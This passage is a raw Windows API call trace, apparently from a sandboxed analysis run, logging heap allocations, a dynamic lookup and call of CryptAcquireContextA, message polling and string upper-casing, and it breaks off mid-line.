[0268.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0268.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0268.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0268.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0268.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0268.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0268.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0268.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0268.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0268.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.461] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0268.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3570 [0268.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0268.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466e10 [0268.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0268.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0268.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.463] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0268.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0268.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0268.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0268.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.463] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2698) returned 1 [0268.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0268.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0268.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0268.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0268.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0268.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0268.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0268.468] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0268.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.469] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.469] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0268.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.470] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.470] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0268.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0268.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0268.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0268.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0268.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.470] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0268.470] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0268.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.471] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0268.471] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0268.471] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0268.472] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.472] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0268.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.472] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.472] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0268.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0268.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0268.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0268.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0268.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.472] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0268.473] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.473] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0268.473] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0268.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0268.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0268.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0268.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0268.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0268.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0268.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0268.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0268.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0268.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0268.475] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.475] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, 